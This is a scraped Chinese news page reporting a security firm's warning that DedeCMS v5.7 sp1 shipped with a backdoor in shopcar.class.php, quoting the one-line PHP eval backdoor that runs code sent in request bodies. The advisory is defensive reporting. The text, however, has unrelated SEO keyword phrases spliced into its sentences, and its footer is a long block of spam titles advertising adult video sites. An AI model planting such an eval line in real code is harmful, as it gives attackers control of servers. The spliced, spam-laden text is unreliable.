返回頂部
關閉軟件導航
位置:首頁 > 資訊 > 織夢新聞>織夢CMS系統現后門70萬網站資料恐不保
  

  【IT168資訊】瑞星公司今日對外發布緊急警示:國內知名的PHP開源網站管理系統——織夢CMS(DedeCms)v5.7 sp1版本被發現植入后門,黑客可通過此后門直接獲得網站的控制權限,獲取存儲在服務器上的文件和數據庫。據CMS官方數據顯示,目前約有70萬網站使用該系統搭建織夢文章批量自動上傳助手,涉及企業、政府機關、媒體機構、行業及個人網站等。瑞星公司特此緊急提醒使用該系統的網站管理員織夢批量更新 ,使用瑞星網站密碼安全檢測系統查找后門并及時進行封堵。

  

  據專家介紹,織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過利用這個后門織夢軟件采集,黑客只需要構造簡單的數據包提交到服務器,就能夠獲取到該網站的WebShell,通過對服務器進一步滲透攻擊,進而獲取服務器的最高權限。

  

  織夢CMS系統現后門70萬網站資料恐不保

  

  ▲CMS中被植入的后門代碼

  

  在黑客攻陷網站后,便可以直接訪問服務器上的文件、數據庫等信息。目前我國有大量網站采用該系統,此后門或將導致大量用戶的信息泄露,造成極為嚴重的影響。

如果您覺得 織夢CMS系統現后門70萬網站資料恐不保 這篇文章對您有用,請分享給您的好友,謝謝
文章地址:http://www.brucezhang.com/article/dede/zmCMSxtxhmwwzzlkbb.html
解放雙手無盡可能,有問題添加天線貓微信
主站蜘蛛池模板: 亚洲人6666成人观看| 亚洲精品午夜国产va久久成人| 国产成人在线免费观看| 成人理论电影在线观看| a级成人高清毛片| 成人片在线观看地址KK4444| 国产成人综合日韩精品无| 国产成人综合久久精品亚洲| 国产成人免费高清激情视频 | 亚洲国产成人久久精品app| 亚洲国产成人手机在线电影bd| 亚洲国产成人无码av在线影院| 国产成人a人亚洲精品无码| 日本成人在线免费| 国产成人免费ā片在线观看| 久久久久亚洲av成人无码| 欧美成人影院在线观看三级| 国产成人精品免费视频大全| 窝窝视频成人影院午夜在线| 国产成人精品视频一区二区不卡| 99久久亚洲综合精品成人网| 在线视频免费国产成人| 欧美成人免费在线视频| 国产成人一级片| 成人欧美精品大91在线| 黄色成人免费网站| 中文国产成人精品久久不卡| 免费国产成人高清视频网站| 国内外成人在线视频| 成人毛片免费观看视频| 成人片黄网站色大片免费 | 亚洲成人一级片| 国产成人综合色视频精品| 成人午夜福利视频| 成人免费无码大片A毛片抽搐色欲| 精品久久久久久成人AV| 全彩成人18h漫画在线| 国产成人精品午夜二三区波多野| 国产成人精品美女在线| 成人av在线一区二区三区| 成人免费在线视频|